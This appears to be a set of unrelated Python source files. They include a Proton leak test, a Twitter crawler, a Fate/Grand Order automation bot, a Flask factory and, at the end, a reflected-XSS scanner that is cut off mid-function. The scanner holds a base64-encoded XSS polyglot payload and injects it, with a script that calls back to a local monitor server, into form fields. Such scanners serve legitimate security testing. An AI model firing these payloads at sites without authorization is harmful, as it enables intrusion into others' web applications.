                GLib.idle_add(
                    self._window.header_bar.pack_start, self._window.progress)
                GLib.idle_add(self._window.show_all)
                def imported(photo_hash, percent):
                    # Per-photo completion callback -> progress fraction.
                    GLib.idle_add(self._window.progress.set_fraction, percent)
                def notify_progress(photo_name):
                    # Per-photo start callback -> progress label text.
                    GLib.idle_add(self._window.progress.set_text, photo_name)
                self._window.library.import_photos(
                    filename, notify_callback=notify_progress,
                    imported_callback=imported,
                    copy_photos=self.options['copy_photos'],
                    delete_originals=self.options['delete_originals'])
                # Restore the UI and re-render the current selection.
                GLib.idle_add(self._window.import_button.set_sensitive, True)
                GLib.idle_add(self._window.export_button.set_sensitive, True)
                GLib.idle_add(
                    self._window.header_bar.remove, self._window.progress)
                GLib.idle_add(
                    self._window.render_selection, self._window.library.update(
                        self._window.selection
                    )
                )
            thread = threading.Thread(target=do_import)
            thread.daemon = True
            thread.start()
        self.destroy()
|
test_PROTON_2116_blocking_connection_object_leak.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
"""
PROTON-2116 Memory leak in python client
PROTON-2192 Memory leak in Python client on Windows
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import logging
import os
import platform
import subprocess
import sys
import threading
import time
import unittest
import uuid
import proton.handlers
import proton.reactor
import proton.utils
logger = logging.getLogger(__name__)
class ReconnectingTestClient:
    """Test client that repeatedly connects/subscribes to a broker and samples
    gc object counts, so the test can detect object leaks across reconnects."""

    def __init__(self, hostport):
        # type: (str) -> None
        self.hostport = hostport
        self.object_counts = []          # gc object counts sampled once per connect loop
        self.done = threading.Event()    # set when run() finishes all iterations

    def count_objects(self, message):
        # type: (str) -> None
        """Collect garbage, then record ("loop" samples) and log the gc object count."""
        gc.collect()
        n = len(gc.get_objects())
        if message == "loop":
            self.object_counts.append(n)
        logger.debug("Message %s, Count %d", message, n)

    def run(self):
        """Connect, receive until the broker dies, clean up; repeat three times."""
        ADDR = "testing123"
        HEARTBEAT = 5
        SLEEP = 5
        recv = None
        conn = None
        for _ in range(3):
            subscribed = False
            # Retry connect/subscribe until the broker is reachable.
            while not subscribed:
                try:
                    conn = proton.utils.BlockingConnection(self.hostport, ssl_domain=None, heartbeat=HEARTBEAT)
                    recv = conn.create_receiver(ADDR, name=str(uuid.uuid4()), dynamic=False, options=None)
                    subscribed = True
                except Exception as e:
                    logger.info("received exception %s on connect/subscribe, retry", e)
                    time.sleep(0.5)
            self.count_objects("loop")
            logger.debug("connected")
            while subscribed:
                try:
                    recv.receive(SLEEP)
                except proton.Timeout:
                    pass
                except Exception as e:
                    # Broker died: tear the link/connection down, best-effort.
                    logger.info(e)
                    try:
                        recv.close()
                        recv = None
                    # Fixed: narrowed the bare excepts -- a bare `except:`
                    # would also swallow KeyboardInterrupt/SystemExit.
                    except Exception:
                        self.count_objects("link close() failed")
                    try:
                        conn.close()
                        conn = None
                        self.count_objects("conn closed")
                    except Exception:
                        self.count_objects("conn close() failed")
                    subscribed = False
        self.done.set()
class Proton2116Test(unittest.TestCase):

    @unittest.skipIf(platform.system() == 'Windows', "PROTON-2192: The issue is not resolved on Windows")
    def test_blocking_connection_object_leak(self):
        """Kills and restarts broker repeatedly, while client is reconnecting.

        The value of `gc.get_objects()` should not keep increasing in the client.
        These are the automated reproduction steps for PROTON-2116"""
        gc.collect()
        thread = None
        client = None
        host_port = ""  # random on first broker startup
        broker_process = None
        while not client or not client.done.is_set():
            try:
                params = []
                if host_port:
                    # Restart the broker on the same port so the client can reconnect.
                    params = ['-b', host_port]
                cwd = os.path.dirname(__file__)
                broker_process = subprocess.Popen(
                    args=[sys.executable,
                          os.path.join(cwd, 'broker_PROTON_2116_blocking_connection_object_leak.py')] + params,
                    stdout=subprocess.PIPE,
                    universal_newlines=True,
                )
                # The broker prints its host:port on the first stdout line.
                host_port = broker_process.stdout.readline()
                if not client:
                    client = ReconnectingTestClient(host_port)
                    thread = threading.Thread(target=client.run)
                    thread.start()
                time.sleep(3)
            finally:
                # Kill the broker each round to force the client to reconnect.
                if broker_process:
                    broker_process.kill()
                    broker_process.wait()
                    broker_process.stdout.close()
                time.sleep(0.3)
        thread.join()
        # Fixed: the original passed the counts as a positional logging arg
        # with no matching %s placeholder, so the value was never rendered
        # (logging reports a formatting error instead).
        logger.info("client.object_counts: %s", client.object_counts)
        # drop first value, it is usually different (before counts settle)
        object_counts = client.object_counts[1:]
        diffs = [c - object_counts[0] for c in object_counts]
        self.assertEqual([0] * 2, diffs, "Object counts should not be increasing")


if __name__ == '__main__':
    unittest.main()
|
search_url_tweets.py | """
Iteratively search for tweets containing one of the URLs on in $TWNEWS_DATA/urls.tsv.
Store the result in $TWNEWS_DATA/tweets.json.
Each tweet json is modified to include two new fields:
- url_query: the url (from balance.org) submitted as a search query
- url_score: the score for that url (from balance.org)
Queries are submitted in order, and the script loops forever. When rate limit
is hit, it sleeps for 5 minutes before continuing.
Note that this will introduce duplicates, which should be filtered downstream.
"""
import codecs
import json
#from multiprocessing import Process, Queue
from threading import Thread
from Queue import Queue
import time
import sys
import traceback
import twutil
from . import __data__
from .balance import load_balance_scores
def do_search(qu, url, score, count=100, result_type='recent'):
    """Search Twitter for tweets mentioning `url` and put them on queue `qu`.

    Puts a list of tweets (annotated with url_query/url_score) on the queue,
    or None on a non-retryable API error.  Sleeps off rate limits and retries.
    (Python 2 code.)

    NOTE(review): the `result_type` parameter is ignored -- the request below
    hard-codes 'recent'.
    """
    # Strip the leading "http://" so the query matches any URL form.
    domain = url[7:]
    while True:
        try:
            result = twutil.collect.twapi.request('search/tweets', {'q': domain, 'count': count, 'result_type': 'recent'})
            if result.status_code == 200:
                tweets = []
                for tweet in result:
                    # Annotate each tweet with the originating query and score.
                    tweet['url_query'] = url
                    tweet['url_score'] = score
                    tweets.append(tweet)
                qu.put(tweets)
                return
            elif result.status_code in [88, 130, 420, 429]:
                # Rate limited / over capacity: back off for five minutes.
                print 'Sleeping off error: ', result.text
                time.sleep(300)
            else:
                sys.stderr.write('Error for %s: %s' % (domain, result.text))
                qu.put(None)
                return
        except:
            # NOTE(review): bare except hides all failures; tolerated here to
            # keep the long-running crawl alive.
            e = sys.exc_info()
            sys.stderr.write('skipping error %s\n%s' % (str(e[0]), traceback.format_exc()))
            return
def search_for_tweets(scores, fname=__data__ + '/tweets.json'):
    """Loop forever over {url: score}, appending found tweets to `fname` as
    one JSON object per line.

    Each query runs in a worker thread with a 15-minute timeout so a stuck
    request cannot stall the crawl.  (Python 2 code.)
    """
    out = codecs.open(fname, 'a', 'utf-8')
    qu = Queue()
    while True:
        for url, score in scores.iteritems():
            p = Thread(target=do_search, args=(qu, url, score))
            p.start()
            # Wait up to 15 minutes for this query's worker.
            p.join(900)
            if p.is_alive():
                print 'no results after 15 minutes for', url, '. continuing.'
            else:
                results = qu.get()
                if results:
                    print 'found', len(results), 'for domain', url
                    for tweet in results:
                        out.write(json.dumps(tweet) + '\n')
            # Small pause between queries to be gentle on the API.
            time.sleep(2)


if __name__ == '__main__':
    scores = load_balance_scores()
    search_for_tweets(scores)
|
runserver.py | #!/usr/bin/env python
from multiprocessing import Process
import subprocess
import os
import configparser
# Read the deployment config once at import time; 'ipaddress' is the
# externally reachable host shown to the user at startup.
_conf = configparser.ConfigParser()
_conf.read('src/deploy.conf')
OutIp = _conf.get('host', 'ipaddress')
BASEPATH = os.path.dirname(os.path.abspath(__file__))
def startdjango():
    """Run the Django dev server (blocking) from the src/ directory."""
    os.chdir(os.path.join(BASEPATH, 'src'))
    # NOTE(review): shell=True with a fixed command string is acceptable
    # here, but would be unsafe if the command ever included external input.
    subprocess.call('python3 manage.py runserver 0.0.0.0:8000', shell=True)
def startnode():
    """Run the Node/webpack dev server (blocking) from the webpage/ directory."""
    os.chdir(os.path.join(BASEPATH, 'webpage'))
    subprocess.call('npm run dev', shell=True)
def main():
    """Start the Django and Node dev servers in child processes and wait on both."""
    print('请访问%s'%OutIp)  # message: "please visit <ip>"
    django = Process(target=startdjango, args=())
    node = Process(target=startnode, args=())
    django.start()
    node.start()
    # Block until both servers exit.
    django.join()
    node.join()


if __name__ == "__main__":
    main()
|
fgoFunc.py | # Stars Cosmos Gods Animus Antrum Unbirth Anima Animusphere
# 星の形.宙の形.神の形.我の形.天体は空洞なり.空洞は虚空なり.虚空には神ありき.
# 地を照らし,空に在り,天上の座標を示せ.
# カルディアの灯よ.
# どうか今一度,旅人の標とならん事を.
# ここで,Bgo運営の敗北を宣言する!
# . OO---O---O-o\
# . // \ / \ / \ \\
# . OO O O O \\
# . // \ \ / / \ \\
# . oO---O---O---O---O-Oo
# . \\ / / \ \ / //
# . \O O O O //
# . \\ / \ / \ / //
# . oO---O---Oo-O
# . ^^
# . Grand Order/Anima Animusphere
# . 冠位指定/人理保障天球
'Full-automatic FGO Script'
__author__='hgjazhgj'
__version__='v7.10.0'
import logging,re,time,numpy
from threading import Thread
from itertools import permutations
from fgoAndroid import Android
from fgoCheck import Check
from fgoControl import control,ScriptTerminate
from fgoFuse import fuse
from fgoImageListener import ImageListener
from fgoLogging import getLogger,logit
logger=getLogger('Func')
friendImg=ImageListener('fgoImage/friend/')
mailImg=ImageListener('fgoImage/mail/')
class Device(Android):
    """Android wrapper that registers itself as the global Check backend."""
    def __init__(self,*args,**kwargs):
        super().__init__(*args,**kwargs)
        # Screenshot checks use this device instance globally.
        Check.device=self

# The single global device used by every routine in this module.
device=Device()
def guardian():
    """Watchdog loop: presses the reconnect key whenever the cached screenshot
    shows the network-error screen."""
    prev=None
    while True:
        # Only react once per distinct screenshot to avoid repeated presses.
        if Check.cache is not prev and Check.cache.isNetworkError():
            logger.warning('Reconnecting')
            device.press('K')
        prev=Check.cache
        time.sleep(3)

# Run the watchdog as a daemon so it never blocks interpreter exit.
Thread(target=guardian,daemon=True,name='Guardian').start()
def gacha():
    """Repeatedly roll the friend-point gacha until the fuse (failure counter)
    reaches its threshold."""
    while fuse.value<30:
        if Check().isGacha():device.perform('MK',(200,2700))
        device.press('\xBB')
def jackpot():
    """Advance the lottery (jackpot) boxes until the fuse trips."""
    while fuse.value<50:
        if Check().isNextJackpot():device.perform('\xDCKJ',(600,2400,500))
        # Mash the draw key to spin through the current box.
        for _ in range(40):device.press('2')
def mailFiltering():
    """Collect every mail item matching a template image in fgoImage/mail/,
    scrolling until the end of the mail list."""
    if not mailImg.flush():return
    Check().setupMailDone()
    while True:
        # Tap each matching entry currently on screen, waiting for every
        # collection animation to complete before the next tap.
        while any((pos:=Check.cache.find(i[1],threshold=.016))and(device.touch(pos),True)[-1]for i in mailImg.items()):
            while not Check().isMailDone():pass
        device.swipe((400,900,400,300))
        if Check().isMailListEnd():break
class Battle:
    """Drives one full battle: tracks turns/stages, casts configured skills,
    and picks command cards.

    The class-level tables are per-servant configuration; from the index
    usage in getSkillInfo/getHouguInfo they appear to encode
    [stage, stageTurn, target, priority] per skill, [stage, priority] per
    noble phantasm, and stage/turn/target data per master skill -- TODO
    confirm against the project's configuration docs.
    """
    skillInfo=[[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]]]
    houguInfo=[[1,7],[1,7],[1,7],[1,7],[1,7],[1,7]]
    masterSkill=[[0,0,0,7],[0,0,0,7],[0,0,0,0,7]]
    def __init__(self):
        # friendInfo holds the support servant's skill/NP data parsed from
        # the friend image filename; -1 means "fall back to own tables".
        Battle.friendInfo=[[[-1,-1,-1,-1],[-1,-1,-1,-1],[-1,-1,-1,-1]],[-1,-1]]
        self.turn=0
        self.stage=0
        self.stageTurn=0
        # On-field party slots -> roster indices (updated when servants die).
        self.servant=[0,1,2]
        # Roster permutation maintained across Order Change casts.
        self.orderChange=[0,1,2,3,4,5]
        self.masterSkillReady=[True,True,True]
        self.rainbowBox=False
    def __call__(self):
        # Main battle loop; returns the number of turns on victory, 0 on defeat.
        while True:
            if Check(0,.3).isTurnBegin():
                self.turn+=1
                # stageTurn resets to 1 whenever the stage number changes.
                self.stage,self.stageTurn=[t:=Check(.2).getStage(),1+self.stageTurn*(self.stage==t)]
                self.friend=Check.cache.isServantFriend()
                Check.cache.getHP(),Check.cache.getNP()
                if self.turn==1:
                    Check.cache.setupServantDead(self.friend)
                    self.stageTotal=Check.cache.getStageTotal()
                # Replace dead front-line servants with the next roster members.
                else:self.servant=(lambda m,p:[m+p.index(i)+1 if i in p else self.servant[i]for i in range(3)])(max(self.servant),(lambda dead:[i for i in range(3)if self.servant[i]<6 and dead[i]])(Check.cache.isServantDead(self.friend)))
                logger.info(f'Turn {self.turn} Stage {self.stage} StageTurn {self.stageTurn} {self.servant}')
                # At the start of each stage, target the enemy with the most HP.
                if self.stageTurn==1:device.perform('\x67\x68\x69'[numpy.argmax(Check.cache.getEnemyHP())]+'\xBB',(800,500))
                # Cast every servant/master skill scheduled for this stage/turn,
                # lowest priority value first.
                while(s:=(lambda skill:[(self.getSkillInfo(i,j,3),0,(i,j))for i in range(3)if self.servant[i]<6 for j in range(3)if skill[i][j]and(t:=self.getSkillInfo(i,j,0))and min(t,self.stageTotal)<<8|self.getSkillInfo(i,j,1)<=self.stage<<8|self.stageTurn])(Check.cache.isSkillReady())+[(self.masterSkill[i][-1],1,i)for i in range(3)if self.masterSkillReady[i]and self.stage==min(self.masterSkill[i][0],self.stageTotal)and self.stageTurn==self.masterSkill[i][1]]):
                    _,cast,arg=min(s,key=lambda x:x[0])
                    if cast==0:
                        # Servant skill: arg is (slot, skill index).
                        device.perform(('ASD','FGH','JKL')[arg[0]][arg[1]],(300,))
                        if t:=self.getSkillInfo(*arg,2):device.perform('234'[t-1],(300,))
                    elif cast==1:
                        # Master skill: arg is the skill index.
                        self.masterSkillReady[arg]=False
                        device.perform('Q'+'WER'[arg],(300,300))
                        if self.masterSkill[arg][2]:
                            # Third master skill with two targets: Order Change.
                            if arg==2 and self.masterSkill[2][3]:
                                if self.masterSkill[2][2]-1 not in self.servant or self.masterSkill[2][3]-1 in self.servant:
                                    # Swap impossible (member missing/already on field): cancel.
                                    device.perform('\xBB',(300,))
                                    continue
                                p=self.servant.index(self.masterSkill[2][2]-1)
                                device.perform(('TYUIOP'[p],'TYUIOP'[self.masterSkill[2][3]-max(self.servant)+1],'Z'),(300,300,2600))
                                self.orderChange[self.masterSkill[2][2]-1],self.orderChange[self.masterSkill[2][3]-1]=self.orderChange[self.masterSkill[2][3]-1],self.orderChange[self.masterSkill[2][2]-1]
                                control.sleep(2.3)
                                while not Check().isTurnBegin():pass
                                self.friend=Check(.5).isServantFriend()
                                Check.cache.setupServantDead(self.friend)
                                continue
                            device.perform('234'[self.masterSkill[arg][2]-1],(300,))
                    # Wait out the skill animation, then refresh the screenshot.
                    control.sleep(2.3)
                    while not Check().isTurnBegin():pass
                    Check(.5)
                # Open card selection and play the chosen cards.
                device.perform(' ',(2100,))
                device.perform(self.selectCard(),(270,270,2270,1270,6000))
            elif Check.cache.isSpecialDropSuspended():
                control.checkKizunaReisou()
                logger.warning('Kizuna Reisou')
                Check.cache.save('fgoLog/SpecialDrop')
                device.press('\x67')
            elif not self.rainbowBox and Check.cache.isSpecialDropRainbowBox():self.rainbowBox=True
            elif Check.cache.isBattleFinished():
                logger.info('Battle Finished')
                if self.rainbowBox:
                    control.checkSpecialDrop()
                    logger.warning('Special drop')
                    Check.cache.save('fgoLog/SpecialDrop')
                return self.turn
            elif Check.cache.isBattleDefeated():
                logger.warning('Battle Defeated')
                control.checkDefeated()
                return 0
            device.press('\xBB')
    @logit(logger,logging.INFO)
    def selectCard(self):return''.join((lambda hougu,sealed,color,resist,critical:['678'[i]for i in sorted((i for i in range(3)if hougu[i]),key=lambda x:self.getHouguInfo(x,1))]+['12345'[i]for i in sorted(range(5),key=(lambda x:-color[x]*resist[x]*(not sealed[x])*(1+critical[x])))]if any(hougu)else(lambda group:['12345'[i]for i in(lambda choice:choice+tuple({0,1,2,3,4}-set(choice)))(logger.debug('cardRank'+','.join((' 'if i%5 else'\n')+f'({j}, {k:5.2f})'for i,(j,k)in enumerate(sorted([(card,(lambda colorChain,firstCardBonus:sum((firstCardBonus+[1.,1.2,1.4][i]*color[j])*(1+critical[j])*resist[j]*(not sealed[j])for i,j in enumerate(card))+(not any(sealed[i]for i in card))*(4.8*colorChain+(firstCardBonus+1.)*(3 if colorChain else 1.8)*(len({group[i]for i in card})==1)*resist[card[0]]))(len({color[i]for i in card})==1,.3*(color[card[0]]==1.1)))for card in permutations(range(5),3)],key=lambda x:-x[1]))))or max(permutations(range(5),3),key=lambda card:(lambda colorChain,firstCardBonus:sum((firstCardBonus+[1.,1.2,1.4][i]*color[j])*(1+critical[j])*resist[j]*(not sealed[j])for i,j in enumerate(card))+(not any(sealed[i]for i in card))*(4.8*colorChain+(firstCardBonus+1.)*(3 if colorChain else 1.8)*(len({group[i]for i in card})==1)*resist[card[0]]))(len({color[i]for i in card})==1,.3*(color[card[0]]==1.1))))])(Check.cache.getCardGroup()))([self.servant[i]<6 and j and(t:=self.getHouguInfo(i,0))and self.stage>=min(t,self.stageTotal)for i,j in enumerate(Check().isHouguReady())],Check.cache.isCardSealed(),Check.cache.getCardColor(),Check.cache.getCardResist(),Check.cache.getCriticalRate())
    # Skill/NP lookups prefer the parsed support-servant data (friendInfo)
    # when the slot holds the friend and the field is not -1.
    def getSkillInfo(self,pos,skill,arg):return self.friendInfo[0][skill][arg]if self.friend[pos]and self.friendInfo[0][skill][arg]>=0 else self.skillInfo[self.orderChange[self.servant[pos]]][skill][arg]
    def getHouguInfo(self,pos,arg):return self.friendInfo[1][arg]if self.friend[pos]and self.friendInfo[1][arg]>=0 else self.houguInfo[self.orderChange[self.servant[pos]]][arg]
class Main:
    """Farming loop: enter a quest, pick a support, run a Battle, repeat
    until AP (and the apple budget) is exhausted."""
    # 1-based team preset to select before battle; 0 means "keep current".
    teamIndex=0
    def __init__(self,appleTotal=0,appleKind=0,battleClass=Battle):
        # appleTotal: how many AP refills are allowed; appleKind indexes the
        # refill key sequence in eatApple; battleClass runs each battle.
        self.appleTotal=appleTotal
        self.appleKind=appleKind
        self.battleClass=battleClass
        self.appleCount=0
        self.battleCount=0
    def __call__(self):
        while True:
            self.battleFunc=self.battleClass()
            # Navigate from whatever screen we are on into the next battle.
            while True:
                if Check(.3,.3).isMainInterface():
                    device.press('8')
                    # Out of AP and out of apples: stop farming.
                    if Check(.7,.3).isApEmpty()and not self.eatApple():return
                    self.chooseFriend()
                    while not Check().isBattleBegin():pass
                    # Switch to the configured team preset if necessary.
                    if self.teamIndex and Check.cache.getTeamIndex()+1!=self.teamIndex:device.perform('\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79'[self.teamIndex-1]+' ',(1000,400))
                    device.perform(' M',(800,10000))
                    break
                elif Check.cache.isBattleContinue():
                    device.press('L')
                    if Check(.7,.3).isApEmpty()and not self.eatApple():return
                    self.chooseFriend()
                    control.sleep(6)
                    break
                elif Check.cache.isTurnBegin():break
                elif Check.cache.isAddFriend():device.perform('X',(300,))
                elif Check.cache.isSpecialDropSuspended():device.perform('\x67',(300,))
                device.press('\xBB')
            self.battleCount+=1
            logger.info(f'Battle {self.battleCount}')
            # Non-zero turn count means victory; otherwise back out of defeat.
            if self.battleFunc():device.press(' ')
            else:device.perform('BIK',(500,500,500))
            control.checkTerminateLater()
    @logit(logger,logging.INFO)
    def eatApple(self):
        """Refill AP if the budget allows; returns falsy when farming must stop."""
        if self.appleCount==self.appleTotal:return device.press('Z')
        self.appleCount+=1
        device.perform('W4K8'[self.appleKind]+'L',(400,1200))
        return self.appleCount
    @logit(logger,logging.INFO)
    def chooseFriend(self):
        """Scroll the support list for a servant matching any template in
        fgoImage/friend/, refreshing the list when nothing matches."""
        refresh=False
        while not Check(.2).isChooseFriend():
            if Check.cache.isNoFriend():
                if refresh:control.sleep(10)
                device.perform('\xBAK',(500,1000))
                refresh=True
        # No template images configured: just take the first support.
        if not friendImg.flush():return device.press('8')
        while True:
            timer=time.time()
            while True:
                # Tap the first support whose template is found on screen;
                # its skill/NP data is parsed from the image filename suffix.
                for i in(i for i,j in friendImg.items()if(lambda pos:pos and(device.touch(pos),True)[-1])(Check.cache.find(j))):
                    Battle.friendInfo=(lambda r:(lambda p:([[[-1 if p[i*4+j]=='X'else int(p[i*4+j],16)for j in range(4)]for i in range(3)],[-1 if p[i+12]=='X'else int(p[i+12],16)for i in range(2)]]))(r.group())if r else[[[-1,-1,-1,-1],[-1,-1,-1,-1],[-1,-1,-1,-1]],[-1,-1]])(re.match('([0-9X]{3}[0-9A-FX]){3}[0-9X][0-9A-FX]$',i[-14:].upper()))
                    return i
                if Check.cache.isFriendListEnd():break
                device.swipe((800,900,800,300))
                Check(.4)
            # Reached the end without a match: refresh (rate-limited to 10s).
            if refresh:control.sleep(max(0,timer+10-time.time()))
            device.perform('\xBAK',(500,1000))
            refresh=True
            while not Check(.2).isChooseFriend():
                if Check.cache.isNoFriend():
                    control.sleep(10)
                    device.perform('\xBAK',(500,1000))
class UserScript:
    """Hand-written opening sequence: cast a fixed key sequence on turn one,
    then hand control to the generic Battle loop."""
    def __call__(self):
        # Dismiss dialogs until the first turn actually begins.
        while not Check(0,.3).isTurnBegin():device.press('\xBB')
        # # BX WCBA with the Arctic Chaldea Uniform mystic code
        # # A D F 2 G H 2 J 2 K L 2 Q E 2 _ 6 5 4
        # device.perform('ADF2GH2J2KL2QE2 654',(3000,3000,350,3000,3000,350,3000,350,3000,3000,350,3000,300,350,3000,2400,350,350,10000))
        # # Hikari Nobu Kintoki wcba atorasu
        # # Q E 2 A F 2 G H 2 J 2 K L 2 _ 6 5 4
        # device.perform('QE2AF2GH2J2KL2 654',(300,350,3000,3000,350,3000,3000,350,3000,350,3000,3000,350,3000,2400,350,350,10000))
        device.perform('QE2',(300,350,3000))
        return Battle()()
|
__init__.py | from flask import Flask
from flask_migrate import Migrate
from . import file_monitor
import config
import threading
from .cache import cache
migrate = Migrate()
def create_app():
    """
    Application factory: build and configure the Flask app.

    Wires up SQLAlchemy/Migrate/cache, registers the blueprints, and starts
    the file-system monitor on a daemon thread.  Returns the ready app.
    """
    app = Flask(__name__)
    # Add SQLAlchemy configuration to the app config
    app.config['SQLALCHEMY_DATABASE_URI'] = config.SQLALCHEMY_DATABASE_URI
    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = \
        config.SQLALCHEMY_TRACK_MODIFICATIONS
    # Initialize application extensions (import here to avoid circular imports)
    from openbrain.models import db
    db.init_app(app)
    migrate.init_app(app, db)
    cache.init_app(app)
    # Register the app blueprints
    from openbrain.settings.views import settings_bp
    from openbrain.visualization.views import visualization_bp
    from openbrain.plotting.views import plotting_bp
    app.register_blueprint(settings_bp)
    app.register_blueprint(visualization_bp)
    app.register_blueprint(plotting_bp)
    # Run file system monitor in a new thread; daemon so it never blocks exit.
    fs_thread = threading.Thread(target=file_monitor.run)
    fs_thread.daemon = True
    fs_thread.start()
    return app
|
ReflectedXSSDetector.py | # coding:utf-8
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs, urlencode
import threading
import time
import base64
import html
import logging
from lib.exceptions import NoRequestsException
from selenium import webdriver
from browsermobproxy import Server
# Base64-encoded fragments of the reflected-XSS probe string. They are decoded
# and concatenated — with the tracking script spliced between them — in
# ReflectedXSSDetector.proceed(). Stored encoded, presumably so the raw
# HTML/JS-breaking literals don't get mangled or flagged; the decoded text is
# a polyglot-style set of tag-breaking / event-handler fragments.
xss_payload = [
    'amFWYXNDcmlwdDovKi0vKmAvKlxgLyonLyoiLyoqLygvKiAqL29OY2xpQ2s9',
    'ICkvLyUwRCUwQSUwZCUwYS8vPC9zdFlsZS88L3RpdExlLzwvdGVYdGFyRWEvPC9zY1JpcHQvLS0hPlx4M2NzVmcvPHNWZy9vTmxvQWQ9',
    'Ly8+XHgzZQ=='
]
# JavaScript injected as the payload body: it redirects the victim page to the
# local monitor server, passing the form uuid, field name and the page URL.
# That callback is how a successful injection is detected (see
# ReflectedXSSDetector.start_server's GET handler).
script_template = "window.location.href='http://127.0.0.1:{}?uuid={}&name={}&url='+window.location.href"
class ReflectedXSSDetector:
    """Scanner that injects reflected-XSS probes into previously crawled GET
    forms and detects successful executions via a local callback HTTP server.

    :param results: shared scan results; must contain a 'requests' dict keyed
                    by form uuid (presence is checked in exec()).
    :param reports: shared list to which make_report() appends its section.
    :param kwargs: options; this module reads 'cookie' (';'-separated k=v
                   pairs), 'browsermobproxy' (path to the proxy binary) and,
                   optionally, 'headless'.
    """
    def __init__(self, results, reports, **kwargs):
        self.results = results
        self.reports = reports
        self.args = kwargs
        # Port of the local "monitor" server the payload calls back to.
        self.listen_port = 9760
        # Guards self.vulnerable, which is appended to from handler threads.
        self.lock = threading.Lock()
        self.vulnerable = []
        self.server = None
        # Parse the "k=v; k2=v2" cookie string into a dict, skipping
        # malformed entries without an '='.
        self.cookies = {}
        for entry in self.args['cookie'].split(';'):
            if entry.find('=') == -1:
                continue
            key, value = entry.strip().split('=', 1)
            self.cookies[key] = value
        # Create proxy server
        logging.info('Starting browsermobproxy server...')
        self.proxy_server = Server(self.args['browsermobproxy'])
        self.proxy_server.start()
        self.proxy = self.proxy_server.create_proxy()
        logging.info('Browsermobproxy server started')
        # Create Chrome engine, routed through the proxy just created.
        logging.info('Creating Selenium Chrome webdriver...')
        self.chrome_options = webdriver.ChromeOptions()
        self.chrome_options.add_argument('--proxy-server={}'.format(self.proxy.proxy))
        if 'headless' in self.args:
            self.chrome_options.add_argument('--headless')
            self.chrome_options.add_argument('--disable-gpu')
        self.chrome_options.add_argument("--disable-extensions")
        self.driver = webdriver.Chrome(chrome_options=self.chrome_options)
        logging.info('Selenium Chrome webdriver created')

    @staticmethod
    def meta():
        """Module metadata, presumably used by the framework's plugin listing."""
        return {
            'name': 'Reflected XSS Detector for all',
            'version': '1.0'
        }

    def start_server(self):
        """Start the callback monitor HTTP server in a daemon thread.

        The injected payload redirects the browser to
        http://127.0.0.1:<listen_port>?uuid=..&name=..&url=.. ; the GET
        handler records each unique (uuid, field-name, url) triple into
        self.vulnerable under self.lock.
        """
        class Handler(BaseHTTPRequestHandler):
            # note: 's' is the handler instance; 'self' is the detector
            # captured from the enclosing scope.
            def do_GET(s):
                query = parse_qs(urlparse(s.path).query)
                if 'uuid' in query and 'name' in query:
                    self.lock.acquire()
                    try:
                        pair = (query['uuid'][0], query['name'][0], query['url'][0])
                        if pair not in self.vulnerable:
                            self.vulnerable.append(pair)
                    finally:
                        self.lock.release()
                # Always answer 200 with an empty body.
                s.send_response(200)
                s.send_header('Content-Type', 'text/html')
                s.end_headers()
                s.wfile.write(b'')

        def start_server():
            logging.info('Starting monitor server at port {}...'.format(self.listen_port))
            self.server.serve_forever()

        self.server = HTTPServer(('127.0.0.1', self.listen_port), Handler)
        t = threading.Thread(target=start_server, daemon=True)
        t.start()
        # Give the server a moment to come up before probing starts.
        time.sleep(3)

    def proceed(self):
        """Build an XSS probe URL for every recorded GET form and load it."""
        for uuid in self.results['requests']:
            logging.info('Testing payload for form {}'.format(uuid))
            request = self.results['requests'][uuid]
            # Only URL-encoded GET forms can be attacked via the query string.
            if request['content-type'] == 'text/plain' or request['method'] != 'GET':
                logging.warning('Skipped form {} due to its "text/plain" Content-Type or "POST" method'.format(uuid))
                continue
            params = {}
            for name in request['fields']:
                field = request['fields'][name]
                if field['type'] in ['text', 'password', 'textarea']:
                    # Free-text fields receive the decoded payload with the
                    # callback script spliced between its fragments.
                    script = script_template.format(self.listen_port, uuid, name)
                    params[name] = \
                        base64.b64decode(xss_payload[0]).decode('utf-8') + script + \
                        base64.b64decode(xss_payload[1]).decode('utf-8') + script + \
                        base64.b64decode(xss_payload[2]).decode('utf-8')
                elif field['type'] == 'radio':
                    params[name] = field['values'][0]
                elif field['type'] == 'checkbox':
                    params[name] = field['value']
                else:
                    params[name] = field['default']
            url = request['url'] + '?' + urlencode(params)
            self.driver.get(url)
            # Re-apply configured session cookies if the page changed them,
            # and reload so the probe runs in the intended session.
            for key in self.cookies:
                exist = self.driver.get_cookie(key)
                if exist is not None and exist['value'] != self.cookies[key]:
                    self.driver.add_cookie({
                        'name': key,
                        'value': self.cookies[key]
                    })
                    self.driver.get(url)

    def stop_server(self):
        """Shut down the callback monitor server."""
        self.server.shutdown()
        logging.info('The monitoring server has been closed')

    def make_report(self):
        """Append a report section describing every confirmed injection."""
        def make_entry(v):
            # v is (form uuid, field name, URL where the payload fired)
            request = self.results['requests'][v[0]]
            return [request['location'], request['url'], request['method'], v[1], html.escape(v[2])]
        self.reports.append({
            'title': 'Reflected XSS Injection Points',
            'overview': 'Found {} Reflected XSS injection point(s)'.format(len(self.vulnerable)),
            'header': ['Form Location', 'Target', 'Method', 'Name', 'XSS Location'],
            'entries': list(map(make_entry, self.vulnerable))
        })

    def exec(self):
        """Run the full detection pass, then release external resources.

        :raises NoRequestsException: when the crawl produced no requests.
        """
        logging.info('Start to test reflected XSS points')
        if 'requests' not in self.results:
            logging.fatal('There\'s no requests in results')
